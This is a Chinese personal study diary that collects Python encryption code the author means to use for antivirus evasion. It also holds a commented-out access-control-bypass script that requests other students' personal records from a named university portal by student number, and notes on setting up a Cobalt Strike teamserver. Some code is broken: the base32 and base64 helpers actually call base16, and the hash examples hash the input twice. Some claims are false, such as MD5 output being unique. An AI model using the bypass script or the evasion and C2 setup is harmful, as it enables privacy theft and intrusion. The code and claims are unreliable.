罗娇燕的学习日记

Xor0ne

2021/04/05

今天主要看的东西如下：

总结：是我太心急了，免杀这个东西需要沉下心去做，去分析才可！并非什么都是新鲜刺激的，平平淡淡乃至是枯燥才是技术本身的样子，而其中深层次的乐趣需要不断去摸索方才知晓！

今天看见的一些用python加密与解密的程序，想着日后免杀或许可以用得上，所以就保存下来了，整理如下。

常见几种加密算法的Python实现：
https://mp.weixin.qq.com/s?src=11×tamp=1617615631&ver=2990&signature=TOjk5yIJdp5J-cPHbiYY2*DQarW3tOmy-nW4ffOI89Dvj7FxrwZqfJe9UhX3bZ8ZsqyOiUe1DAx7kl-cPmMnPa355hjrD5tmQy8r6ZhNlihD3Bq9Yw4FAMr8KUeH4Yi8&new=1
常见加密算法的Python实现：
https://mp.weixin.qq.com/s?src=11×tamp=1617617061&ver=2990&signature=2nBzWxJwhhxvmBUDjdd4KpEfevN8AAeFrU8GY96yaXEzs-8itN4rSSH9JSqb5MYPZpEaSTy-6pt0oGGDj3q-u2jtJr0ICv38DOfDL8njYSEVVNvuKPGSHBl60dtw*NbC&new=1


目录如下：

0x01 base64加解密
0x02散列算法
1.MD5加密
2.SHA1加密
安全哈希加密技术，是当今世界最先近的加密算法。主要用于文件身份识别、数字签名和口令加密等。 对于长度小于2^64位的消息A，SHA1会产生一个160位的消息摘要B。且明文信息A和识别码B之间同时满足以下条件：
3. HMAC加密
0x03 对称密钥算法--分组密码
1.分组/块密码
（1）DES
（2）AES
（3）分组密码的四种模式
1、ECB模式
2、CBC模式（使用最多的模式）
（4）ECC加密
0x04非对称加密算法

0x01 base64加解密


参考链接：
Base64加密原理：https://blog.csdn.net/lazyer_dog/article/details/82628076
Base64就是一种基于64个可打印字符来表示二进制数据的方法。Base64加密方式是将三个八位的字节转化为四个六位的字节（不足八位的高位补00），3*8 = 4*6；所以base64加密过后的内容比原来的大三分之一；

1. 举例：加密“ace”，
   
2. ace转化为二进制为：‭01100001‬ ‭01100011‬ ‭01100101‬
   
3. 转化为base64的四字节六位：011000 01‬‭0110 0011‬01 100101‬
   
4. 那因为计算机是一字节八位的存数，所以高位补00后变为：
   
5. 00011000 0001‬‭0110 000011‬01 00100101‬
   
6. 转化为十进制：24 22 13 37

复制代码

查Base64对照表（默认版本RFC2045）：

import base64

# 要加密的字符串
str_encrypt = 'hello！'
# 加密方法，encode-转化为byte类型
base64_encrypt = base64.b64encode(str_encrypt.encode())
# 将字节串转为字符串
base64_encrypt_str = base64_encrypt.decode()
print("BASE64加密串:", base64_encrypt_str, type(base64_encrypt_str))

# 解密方法，encode-字符串转为字节串
base64_decrypt = base64_encrypt_str.encode()
# 得到加密的字符串
str_decrypt = base64.b64decode(base64_decrypt).decode()
print("BASE64解密串:", str_decrypt, type(str_decrypt))

BASE64加密串: aGVsbG/vvIE= <class 'str'>
BASE64解密串: hello！ <class 'str'>


0x02散列算法


1.MD5加密
MD5信息摘要算法（英语：MD5 Message-Digest Algorithm），一种被广泛使用的密码散列函数，可以产生出一个128位（16字节）的散列值（hash value），用于确保信息传输完整一致。
MD5算法的原理可简要的叙述为：MD5码以512位分组来处理输入的信息，且每一分组又被划分为16个32位子分组，经过了一系列的处理后，算法的输出由四个32位分组组成，将这四个32位分组级联后将生成一个128位（16字节）散列值。它对应任何字符串都可以加密成一段唯一的固定长度的代码，用于确保信息传输完整一致。目前MD5加密算法是不可逆的，当然这种方式加密的密文也不需要解密，需要的时候直接发送原始密文就好。

import hashlib

str_encrypt = "hello！"
# 对要加密的字符串进行加密
hash = hashlib.md5(str_encrypt.encode())
# dict1.update(dict2)函数把字典dict2的键/值对更新到dict1里
hash.update(str_encrypt.encode("utf8"))
# digest--返回摘要，作为二进制数据字符串值
value = hash.digest()
# 二进制
print("二进制的字符串", repr(value)) # repr函数将对象转化为供解释器读取的形式。

# 十六进制
# hexdigest--返回摘要，作为十六进制数据字符串值
print("十六进制的字符串", hash.hexdigest())

二进制的字符串 b'%\xe2\n\x04\x86\xa7\xf4\xc5Y@\xfa\xc7\xd6\xdc\t_'
十六进制的字符串 25e20a0486a7f4c55940fac7d6dc095f


2.SHA1加密
安全哈希加密技术，是当今世界最先近的加密算法。主要用于文件身份识别、数字签名和口令加密等。 对于长度小于2^64位的消息A，SHA1会产生一个160位的消息摘要B。且明文信息A和识别码B之间同时满足以下条件：
1、对于任意两条不同的明文信息A1、A2，其识别码B1、B2都不相同。
2、无法通过逆向算法由识别码B倒推出明文信息A。
通过散列算法可实现数字签名实现，数字签名的原理是将要传送的明文通过一种函数运算（Hash）转换成报文摘要，报文摘要加密后与明文一起传送给接受方，接受方将接受的明文产生新的报文摘要与发送方的发来报文摘要解密比较，如果不一致表示明文已被篡改。

import hashlib

str_encrypt = "hello！"

# 对要加密的字符串进行加密
hash = hashlib.sha1(str_encrypt.encode())
hash.update(str_encrypt.encode("utf8"))
value = hash.hexdigest()

# 十六进制
print("十六进制的字符串",value)

十六进制的字符串 b8b92f40e0c5df69dcf5cdc1e327e1f87188aeb9

3. HMAC加密
散列信息鉴别码（Hash Message Authentication Code）， HMAC加密算法是一种安全的基于加密hash函数和共享密钥的消息认证协议。
实现原理是用公开函数和密钥产生一个固定长度的值作为认证标识，用这个标识鉴别消息的完整性。

import hmac
import hashlib


str_encrypt = "hello！"
key="abc"
# 第一个参数是密钥key，第二个参数是待加密的字符串，第三个参数是hash函数


mac = hmac.new(key.encode(encoding="utf-8"),str_encrypt.encode("utf8"),hashlib.md5)


value=mac.hexdigest()  # 加密后字符串的十六进制格式


# 十六进制
print("十六进制的字符串",value)

十六进制的字符串 221479c27474cdf1ee245ffef26cfeee


0x03 对称密钥算法--分组密码
1.分组/块密码
（1）DES


数据加密标准（Data Encryption Standard），属于对称加密算法。是一种使用密钥加密的块算法。接口参数有三个：Key、Data、Mode，Key为工作密钥；Data为8个字节64位，是要被加密或被解密的数据；Mode工作方式：加密或解密。

import binascii
from pyDes import des, CBC, PAD_PKCS5
# 需要安装 pip install pyDes


#加密过程
def des_encrypt(secret_key,s):
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    en = k.encrypt(s, padmode=PAD_PKCS5)
    return binascii.b2a_hex(en)


#解密过程
def des_decrypt(secret_key, s):
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5)
    return de


secret_str = des_encrypt('12345678', 'hello!')
print(secret_str)


clear_str = des_decrypt('12345678', secret_str)
print(clear_str)

b'7c48af7e37ecd280'
b'hello!'


（2）AES


高级加密标准（Advanced Encryption Standard），又称Rijndael加密法，是美国联邦政府采用的一种区块加密标准。对加密快和密钥的字节数都有一定的要求，AES密钥长度的最少支持为128、192、256，加密块分组长度128位。需要知道密钥才能解密。
使用命令pip3 install pycryptodome，安装pycryptodome


（3）分组密码的四种模式
分组密码加密中的四种模式有ECB、CBC、CFB、OFB。其中最常见的有ECB和CBC。


1、ECB模式
对明文分组，每组明文通过加密算法和密钥位运算得到密文，之后按照顺序将计算所得的密文连在一起即可，各段数据之间互不影响。

#ECB加密模式

import base64
from Crypto.Cipher import AES

#使用补0方法

# # 需要补位，补足为16的倍数
def add_to_16(s):
    while len(s) % 16 != 0:
        s += '\0'
    return str.encode(s)  # 返回bytes


# 密钥长度必须为16、24或32位，分别对应AES-128、AES-192和AES-256
key = 'abc4567890abc458'
# 待加密文本
text = 'hello'
# 初始化加密器
aes = AES.new(add_to_16(key), AES.MODE_ECB)
# 加密
encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
# 解密
decrypted_text = str(
    aes.decrypt(base64.decodebytes(bytes(encrypted_text, encoding='utf8'))).rstrip(b'\0').decode("utf8"))


print('加密值：', encrypted_text)
print('解密值：', decrypted_text)

加密值： p3i7p25Ypel2X2yrFG4rCQ==
解密值： hello


2、CBC模式（使用最多的模式）

CBC模式需要一个初始化向量iv（和密钥长度相等的字符串），一般通过密钥生成器获取。


加密步骤如下：
1）首先将数据分组得到D1D2…Dn
2）第一组数据D1与初始化向量iv位运算的结果进行加密得到第一组密文C1
3）第二组数据D2与第一组的加密结果C1位运算以后的结果进行加密，得到第二组密文C2
4）之后的数据以此类推，得到Cn
5）按顺序连为C1C2C3…Cn即为加密结果。

特点：
1.不容易主动攻击,安全性好于ECB,适合传输长度长的报文,是SSL、IPSec的标准。每个密文块依赖于所有的信息块，明文消息中一个改变会影响所有密文块
2.发送方和接收方都需要知道初始化向量
3.加密过程是串行的，无法被并行化（在解密时，从两个邻接的密文块中即可得到一个平文块。因此，解密过程可以被并行化。）
4.解密时初始化向量必须相同


CBC加密模式（一）

#CBC加密模式
import base64
from Crypto.Cipher import AES
from urllib import parse
AES_SECRET_KEY = 'helloBrook2abcde'  # 此处16|24|32个字符
IV = 'helloBrook2abcde'
# padding算法
BS = len(AES_SECRET_KEY)
# 填充方案
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
# 解密时删除填充的值
unpad = lambda s: s[0:-ord(s[-1:])]
def cryptoEn(string, key, iv):
# param string: 原始数据
# param key: 密钥
# param iv: 向
    mode = AES.MODE_CBC
    cipher = AES.new(key.encode("utf8"),mode,iv.encode("utf8"))
    encrypted = cipher.encrypt(bytes(pad(string), encoding="utf8"))
    return base64.b64encode(encrypted).decode("utf-8")
#CBC模式的解密代码
def cryptoDe(destring, key, iv):
# param destring: 需要解密的数据
# param key: 密钥
# param iv: 向量
    mode = AES.MODE_CBC
   
    decode = base64.b64decode(destring)
    cipher = AES.new(key.encode("utf8"),mode,iv.encode("utf8"))
    decrypted = cipher.decrypt(decode)
    return unpad(decrypted).decode("utf-8")
secret_str = cryptoEn('hello', AES_SECRET_KEY,IV)
print("加密值：",secret_str)
clear_str = cryptoDe(secret_str.encode("utf8"), AES_SECRET_KEY,IV)
print("解密值：",clear_str)

加密值： sqlpZ0AdaRAOQRabchzltQ==
解密值： hello


CBC解密模式（二）

import base64
from Crypto.Cipher import AES


AES_SECRET_KEY = 'helloBrook2abcde'  # 此处16|24|32个字符
IV = 'helloBrook2abcde'


# padding算法
BS = len(AES_SECRET_KEY)
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1:])]




class AES_ENCRYPT(object):
    def __init__(self):
        self.key = AES_SECRET_KEY
        self.mode = AES.MODE_CBC


    # 加密函数
    def encrypt(self, text):
        cryptor = AES.new(self.key.encode("utf8"), self.mode, IV.encode("utf8"))
        self.ciphertext = cryptor.encrypt(bytes(pad(text), encoding="utf8"))
        # AES加密时候得到的字符串不一定是ascii字符集的，输出到终端或者保存时候可能存在问题，使用base64编码
        return base64.b64encode(self.ciphertext).decode("utf-8")


    # 解密函数
    def decrypt(self, text):
        decode = base64.b64decode(text)
        cryptor = AES.new(self.key.encode("utf8"), self.mode, IV.encode("utf8"))
        plain_text = cryptor.decrypt(decode)
        return unpad(plain_text).decode("utf-8")




if __name__ == '__main__':
    aes_encrypt = AES_ENCRYPT()
    text = "Python"
    e = aes_encrypt.encrypt(text)
    d = aes_encrypt.decrypt(e)
    print(text)
    print(e)
    print(d)

待加密字符串：Python
加密值：X09JC6IqnsDFp9b9C57cUA==
解密值：Python


如果字符串包含中文，先对文本转ascii码，将支持中文加密
text = base64.b64encode(text.encode('utf-8')).decode('ascii')






（4）ECC加密


全称：椭圆曲线加密（Elliptic Curve Cryptography），ECC加密算法是一种公钥加密技术，以椭圆曲线理论为基础。利用有限域上椭圆曲线的点构成的Abel群离散对数难解性，实现加密、解密和数字签名。将椭圆曲线中的加法运算与离散对数中的模乘运算相对应，就可以建立基于椭圆曲线的对应密码体制。

# -*- coding:utf-8 *-
# author: DYBOY
# reference codes: https://blog.dyboy.cn/websecurity/121.html
# description: ECC椭圆曲线加密算法实现
"""
    考虑K=kG ，其中K、G为椭圆曲线Ep(a,b)上的点，n为G的阶（nG=O∞ ），k为小于n的整数。
    则给定k和G，根据加法法则，计算K很容易但反过来，给定K和G，求k就非常困难。
    因为实际使用中的ECC原则上把p取得相当大，n也相当大，要把n个解点逐一算出来列成上表是不可能的。
    这就是椭圆曲线加密算法的数学依据
    点G称为基点（base point）
    k（k<n）为私有密钥（privte key）
    K为公开密钥（public key)
"""


def get_inverse(mu, p):
    """
    获取y的负元
    """
    for i in range(1, p):
        if (i*mu)%p == 1:
            return i
    return -1


def get_gcd(zi, mu):
    """
    获取最大公约数
    """
    if mu:
        return get_gcd(mu, zi%mu)
    else:
        return zi


def get_np(x1, y1, x2, y2, a, p):
    """
    获取n*p，每次+p，直到求解阶数np=-p
    """
    flag = 1  # 定义符号位（+/-）


    # 如果 p=q  k=(3x2+a)/2y1mod p
    if x1 == x2 and y1 == y2:
        zi = 3 * (x1 ** 2) + a  # 计算分子      【求导】
        mu = 2 * y1    # 计算分母


    # 若P≠Q，则k=(y2-y1)/(x2-x1) mod p
    else:
        zi = y2 - y1
        mu = x2 - x1
        if zi* mu < 0:
            flag = 0        # 符号0为-（负数）
            zi = abs(zi)
            mu = abs(mu)


    # 将分子和分母化为最简
    gcd_value = get_gcd(zi, mu)     # 最大公約數
    zi = zi // gcd_value            # 整除
    mu = mu // gcd_value
    # 求分母的逆元  逆元： ∀a ∈G ，ョb∈G 使得 ab = ba = e
    # P(x,y)的负元是 (x,-y mod p)= (x,p-y) ，有P+(-P)= O∞
    inverse_value = get_inverse(mu, p)
    k = (zi * inverse_value)


    if flag == 0:                   # 斜率负数 flag==0
        k = -k
    k = k % p
    # 计算x3,y3 P+Q
    """
        x3≡k2-x1-x2(mod p)
        y3≡k(x1-x3)-y1(mod p)
    """
    x3 = (k ** 2 - x1 - x2) % p
    y3 = (k * (x1 - x3) - y1) % p
    return x3,y3


def get_rank(x0, y0, a, b, p):
    """
    获取椭圆曲线的阶
    """
    x1 = x0             #-p的x坐标
    y1 = (-1*y0)%p      #-p的y坐标
    tempX = x0
    tempY = y0
    n = 1
    while True:
        n += 1
        # 求p+q的和，得到n*p，直到求出阶
        p_x,p_y = get_np(tempX, tempY, x0, y0, a, p)
        # 如果 == -p,那么阶数+1，返回
        if p_x == x1 and p_y == y1:
            return n+1
        tempX = p_x
        tempY = p_y


def get_param(x0, a, b, p):
    """
    计算p与-p
    """
    y0 = -1
    for i in range(p):
        # 满足取模约束条件，椭圆曲线Ep(a,b)，p为质数，x,y∈[0,p-1]
        if i**2%p == (x0**3 + a*x0 + b)%p:
            y0 = i
            break


    # 如果y0没有，返回false
    if y0 == -1:
        return False


    # 计算-y（负数取模）
    x1 = x0
    y1 = (-1*y0) % p
    return x0,y0,x1,y1


def get_graph(a, b, p):
    """
    输出椭圆曲线散点图
    """
    x_y = []
    # 初始化二维数组
    for i in range(p):
        x_y.append(['-' for i in range(p)])


    for i in range(p):
        val =get_param(i, a, b, p)  # 椭圆曲线上的点
        if(val != False):
            x0,y0,x1,y1 = val
            x_y[x0][y0] = 1
            x_y[x1][y1] = 1


    print("椭圆曲线的散列图为：")
    for i in range(p):              # i= 0-> p-1
        temp = p-1-i        # 倒序


        # 格式化输出1/2位数，y坐标轴
        if temp >= 10:
            print(temp, end=" ")
        else:
            print(temp, end="  ")


        # 输出具体坐标的值，一行
        for j in range(p):
            print(x_y[j][temp], end="  ")
        print("")   #换行


    # 输出 x 坐标轴
    print("  ", end="")
    for i in range(p):
        if i >=10:
            print(i, end=" ")
        else:
            print(i, end="  ")
    print('\n')


def get_ng(G_x, G_y, key, a, p):
    """
    计算nG
    """
    temp_x = G_x
    temp_y = G_y
    while key != 1:
        temp_x,temp_y = get_np(temp_x,temp_y, G_x, G_y, a, p)
        key -= 1
    return temp_x,temp_y


def ecc_main():
    while True:
        a = int(input("请输入椭圆曲线参数a(a>0)的值："))
        b = int(input("请输入椭圆曲线参数b(b>0)的值："))
        p = int(input("请输入椭圆曲线参数p(p为素数)的值："))   #用作模运算


        # 条件满足判断
        if (4*(a**3)+27*(b**2))%p == 0:
            print("您输入的参数有误，请重新输入！！！\n")
        else:
            break


    # 输出椭圆曲线散点图
    get_graph(a, b, p)


    # 选点作为G点
    print("user1：在如上坐标系中选一个值为G的坐标")
    G_x = int(input("user1：请输入选取的x坐标值："))
    G_y = int(input("user1：请输入选取的y坐标值："))


    # 获取椭圆曲线的阶
    n = get_rank(G_x, G_y, a, b, p)


    # user1生成私钥，小key
    key = int(input("user1：请输入私钥小key（<{}）：".format(n)))


    # user1生成公钥，大KEY
    KEY_x,kEY_y = get_ng(G_x, G_y, key, a, p)


    # user2阶段
    # user2拿到user1的公钥KEY，Ep(a,b)阶n，加密需要加密的明文数据
    # 加密准备
    k = int(input("user2：请输入一个整数k（<{}）用于求kG和kQ：".format(n)))
    k_G_x,k_G_y = get_ng(G_x, G_y, k, a, p)                         # kG
    k_Q_x,k_Q_y = get_ng(KEY_x, kEY_y, k, a, p)                     # kQ


    # 加密
    plain_text = input("user2：请输入需要加密的字符串:")
    plain_text = plain_text.strip()
    #plain_text = int(input("user1：请输入需要加密的密文："))
    c = []
    print("密文为：",end="")
    for char in plain_text:
        intchar = ord(char)
        cipher_text = intchar*k_Q_x
        c.append([k_G_x, k_G_y, cipher_text])
        print("({},{}),{}".format(k_G_x, k_G_y, cipher_text),end="-")




    # user1阶段
    # 拿到user2加密的数据进行解密
    # 知道 k_G_x,k_G_y，key情况下，求解k_Q_x,k_Q_y是容易的，然后plain_text = cipher_text/k_Q_x
    print("\nuser1解密得到明文：",end="")
    for charArr in c:
        decrypto_text_x,decrypto_text_y = get_ng(charArr[0], charArr[1], key, a, p)
        print(chr(charArr[2]//decrypto_text_x),end="")


if __name__ == "__main__":
    print("*************ECC椭圆曲线加密*************")
    ecc_main()

0x04非对称加密算法


具体原理可以参考：https://www.jianshu.com/p/7a4645691c68
全称：Rivest-Shamir-Adleman，RSA加密算法是一种非对称加密算法。在公开密钥加密和电子商业中RSA被广泛使用。它被普遍认为是目前最优秀的公钥方案之一。RSA是第一个能同时用于加密和数字签名的算法，它能够抵抗到目前为止已知的所有密码攻击。

# -*- coding: UTF-8 -*-
# reference codes: https://www.jianshu.com/p/7a4645691c68


import base64
import rsa
from rsa import common


# 使用 rsa库进行RSA签名和加解密
class RsaUtil(object):
    PUBLIC_KEY_PATH = 'xxxxpublic_key.pem'  # 公钥
    PRIVATE_KEY_PATH = 'xxxxxprivate_key.pem'  # 私钥


    # 初始化key
    def __init__(self,
                 company_pub_file=PUBLIC_KEY_PATH,
                 company_pri_file=PRIVATE_KEY_PATH):


        if company_pub_file:
            self.company_public_key = rsa.PublicKey.load_pkcs1_openssl_pem(open(company_pub_file).read())
        if company_pri_file:
            self.company_private_key = rsa.PrivateKey.load_pkcs1(open(company_pri_file).read())


    def get_max_length(self, rsa_key, encrypt=True):
        """加密内容过长时 需要分段加密 换算每一段的长度.
            :param rsa_key: 钥匙.
            :param encrypt: 是否是加密.
        """
        blocksize = common.byte_size(rsa_key.n)
        reserve_size = 11  # 预留位为11
        if not encrypt:  # 解密时不需要考虑预留位
            reserve_size = 0
        maxlength = blocksize - reserve_size
        return maxlength


    # 加密 支付方公钥
    def encrypt_by_public_key(self, message):
        """使用公钥加密.
            :param message: 需要加密的内容.
            加密之后需要对接过进行base64转码
        """
        encrypt_result = b''
        max_length = self.get_max_length(self.company_public_key)
        while message:
            input = message[:max_length]
            message = message[max_length:]
            out = rsa.encrypt(input, self.company_public_key)
            encrypt_result += out
        encrypt_result = base64.b64encode(encrypt_result)
        return encrypt_result


    def decrypt_by_private_key(self, message):
        """使用私钥解密.
            :param message: 需要加密的内容.
            解密之后的内容直接是字符串，不需要在进行转义
        """
        decrypt_result = b""


        max_length = self.get_max_length(self.company_private_key, False)
        decrypt_message = base64.b64decode(message)
        while decrypt_message:
            input = decrypt_message[:max_length]
            decrypt_message = decrypt_message[max_length:]
            out = rsa.decrypt(input, self.company_private_key)
            decrypt_result += out
        return decrypt_result


    # 签名 商户私钥 base64转码
    def sign_by_private_key(self, data):
        """私钥签名.
            :param data: 需要签名的内容.
            使用SHA-1 方法进行签名（也可以使用MD5）
            签名之后，需要转义后输出
        """
        signature = rsa.sign(str(data), priv_key=self.company_private_key, hash='SHA-1')
        return base64.b64encode(signature)


    def verify_by_public_key(self, message, signature):
        """公钥验签.
            :param message: 验签的内容.
            :param signature: 对验签内容签名的值（签名之后，会进行b64encode转码，所以验签前也需转码）.
        """
        signature = base64.b64decode(signature)
        return rsa.verify(message, signature, self.company_public_key)

Xor0ne

2021年4月7日

如下为这两天看的，有点杂乱了。
今天下午开始看pwn了，隔了一段时间，似乎有点不大适应了，看着看着自己就开始烦躁起来了，静不下来，勉强着坚持了一会儿，实在是有点心不在焉，后来就搁置了，看了下python的optparse模块（为以后写脚本做铺垫）。base16/32/64加密的程序写了一个，算是python的练习吧。（做免杀时的感悟，多多加密免杀效果棒棒哒！因此就想着把一些加密程序收集起来，后期慢慢写出一个属于自己的加密小工具为免杀做准备吧！）
其实写着写着，发现编写代码其实挺有趣的，就看自己怎么去看待他了，



目录

0x01 python加解密（一）base

0x02 ecjtu抓包练习

# -*- coding: utf-8 -*-
"""
Created on Mon Apr  5 19:47:56 2021
2021/04/05-0407 base--by xorone
@author: 20544
"""
import base64

# base16的加密程序
def base16_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base16_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

# base32的加密程序
def base32_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base32_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

# base64的加密程序
def base64_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base64_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

def method(plain, crypt, t):  
    try:
        if crypt == 1: # 加密
            fun_name = 'base' + str(t) + '_encrypt'
            # print(eval(fun_name)(plain)) # eval执行拼接后的函数名
            return eval(fun_name)(plain)
        elif crypt == 2:
            fun_name = 'base' + str(t) + '_decrypt'
            # print(eval(fun_name)(plain))
            return eval(fun_name)(plain)
        else:
            # print("请选择正确的加密方式！")
            return '请选择正确的加密方式！'
    except:
        # print("请检测输入的base参数是否有错误！")
        return "请检测输入的base参数是否有错误！"



if __name__=="__main__":
    plain_text = input("请输入要字符串：")
    crypt = int(input("请选择加加密或解密：1.加密 2.解密 \n"))
    t = int(input("请选择要加密的类型：16.base16 32.base32 64.base64 \n"))
    crypt_text = method(plain_text, crypt, t)
    print('变化后的字符串为', crypt_text)

0x02 ecjtu抓包练习
今天恰好看见前几天发的一个任务，


这个我好像分析过，把自己以前写的代码放下面吧！
功能：通过一个学生的正确账号和密码可以查询某个学号学生的个人信息。（原因：利用越权漏洞）
如下，一下参数经过了脱敏处理。

# -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 19:07:36 2021
智慧交大测试 -- 0317
@author: 20544
"""
import requests
import json



# 查看密码字符串加密后的值
# def crypto_passwd(passwd):
#     url = 'http://cas.ecjtu.edu.cn/cas/loginPasswdEnc'
#     headers = {
#         'Host': 'cas.ecjtu.edu.cn',
#         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#         'cookie':'key_dcp_cas=XX!496990976; dcpcascookie=XX||neusoft||false||false',
#         'X-Requested-With': 'XMLHttpRequest',
#         'Origin': 'http://cas.ecjtu.edu.cn'
#         }

#     data = {
#             "pwd":"XX"
#             }

#     re = requests.post(url, headers=headers, data=data)
#     print("加密后的字符串为：\n"+re.text)


# 登录验证
# url = 'http://cas.ecjtu.edu.cn/cas/login '
# headers = {
#     'Host': 'cas.ecjtu.edu.cn',
#     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#     'cookie':'key_dcp_cas=XX!XX; dcpcascookie=XX||neusoft||false||false',
#     'Content-Type': 'application/x-www-form-urlencoded',
#     'Origin': 'http://cas.ecjtu.edu.cn'
#     }
# data = {
#         "encodedService":"http%253a%252f%252fportal.ecjtu.edu.cn%252fdcp_sis%252fforward.action%253fpath%253d%252fportal%252fportal%2526p%253dsisxgxszhxxcx%2526sid%253dsis_xg%2526param%XX",
#         'service':'http%3A%2F%2Fportal.ecjtu.edu.cn%2Fdcp_sis%2Fforward.action%3Fpath%3D%2Fportal%2Fportal%26p%3Dsisxgxszhxxcx%26sid%3Dsis_xg%26param%XX',
#         'serviceName':'null',
#         'loginErrCnt':'0',
#         'username':'XX',
#         'password':'XX',
#         'lt':'LT-432178-XX'
#         }
# re = requests.post(url, headers=headers, data=data)
# print(re.text)


# # 输入学号返回个人信息
# def search_xh(number):
#     try:
#     # url = 'http://portal.ecjtu.edu.cn/dcp_sis/portal/gVarInit.jsp?p=sisxgxszhxxcx&gId=null&user_id=null&cid=null&template_type=1'
#         url = "http://portal.ecjtu.edu.cn/dcp_sis/xgcomm/xgcomm.action"
#         headers = {
#             'Host': 'portal.ecjtu.edu.cn',
#             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#             'Cookie':'key_dcp_sis_v6=XX!1469577997; key_dcp_v6=XX!1661723328; key_report_v6=XX!-1743436901;JSESSIONID=XX!1469577997',
#             'Origin': 'http://portal.ecjtu.edu.cn',
#             'render': 'json',
#             'clientType': 'json'
#             }
#         # data属于json格式，因此发送的时候需要转换为json格式
#         data = {"map":{"method":"getCommInfo","params":{"javaClass":"java.util.ArrayList","list":["base",number]}},"javaClass":"java.util.HashMap"}

#         re = requests.post(url, data=json.dumps(data), headers=headers)
#         print(re.json()['list'])

#     except:
#         print("查询失败！请检查学号是否输入错误！")

if __name__ == '__main__':
    # number = "XX"
    # search_xh(number)
    # crypto_passwd(XX);

            
   

Xor0ne

​

​

【20210103】作者：xor0ne
参考链接：
cobalt skrike合法证书实现ssl加密通讯：
https://www.cnblogs.com/supdon/p/14688257.html

0x01 前景准备1.文件夹结构

1. |-cobaltstrike.auth # 客户端授权文件
   
2. |-cobaltstrike.jar # 主文件
   
3. |-cobaltstrike.store # 证书文件
   
4. |-teamserver #服务器启动文件
   
5. |-c2lint # 可用于测试修改后的.profile文件是否有用
   
6. |-其他：破解文件、汉化文件、第三方插件(常见是.cna文件，基于sleep语言)等等

复制代码

2.服务器端和客户端启动

（1）服务端启动文件：teamserver
服务器端的启动文件：如下以Linux下为例，使用的是shell语言

1）从该文件中我们可以发现启动服务器端的必须是管理员权限的用户，即root：

1. # check that we're r00t，检查执行用户是否是root权限
   
2. if [ $UID -ne 0 ]; then
   
3.     print_error "Superuser privileges are required to run the team server"
   
4.     exit
   
5. fi

复制代码

2）java环境必须安装。

1. # check if java is available...
   
2. if [ $(command -v java) ]; then
   
3.     true
   
4. else
   
5.     print_error "java is not in \$PATH"
   
6.     echo "    is Java installed?"
   
7.     exit
   
8. fi

复制代码

3）keytool必须可以使用。
keytools是什么？参考链接：https://blog.csdn.net/zlfing/article/details/77648430
Keytool 是一个Java 数据证书的管理工具 ,Keytool 将密钥（key）和证书（certificates）存在一个称为keystore的文件中 在keystore里，包含两种数据：
密钥实体（Key entity）——密钥（secret key）又或者是私钥和配对公钥（采用非对称加密）
可信任的证书实体（trusted certificate entries）——只包含公钥

1. # check if keytool is available...
   
2. if [ $(command -v keytool) ]; then
   
3.     true
   
4. else
   
5.     print_error "keytool is not in \$PATH"
   
6.     echo "    install the Java Developer Kit"
   
7.     exit
   
8. fi

复制代码

4）ketyools证书生成

1. # generate a certificate
   
2.     # naturally you're welcome to replace this step with your own permanent certificate.
   
3.     # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
   
4.     # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
   
5.     # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
   
6.     # is printed so users may have a chance to verify they're not being owned.
   
7. if [ -e ./cobaltstrike.store ]; then
   
8.     print_info "Will use existing X509 certificate and keystore (for SSL)"
   
9. else
   
10.     print_info "Generating X509 certificate and keystore (for SSL)"
    
11.     keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
    
12. fi

复制代码

主要的生成指令如下，

1. keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"

复制代码

我们一一拆解然后分析。

1. keytool
   
2. -keystore ./cobaltstrike.store  # 指定密钥库的名称(产生的各类信息将不在.keystore文件中)，即存储密钥的文件
   
3. -storepass 123456 # 指定密钥库的密码(获取keystore信息所需的密码)
   
4. -keypass 123456 # 指定别名条目的密码(私钥的密码)
   
5. -genkey #在用户主目录中创建一个默认文件".keystore",还会产生一个mykey的别名，mykey中包含用户的公钥、私钥和证书
   
6. -keyalg RSA # 指定密钥的算法 (如 RSA  DSA（如果不指定默认采用DSA）)
   
7. -alias cobaltstrike # 产生别名
   
8. -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" # 指定证书拥有者信息

复制代码

5）启动指令：

1. # start the team server.
   
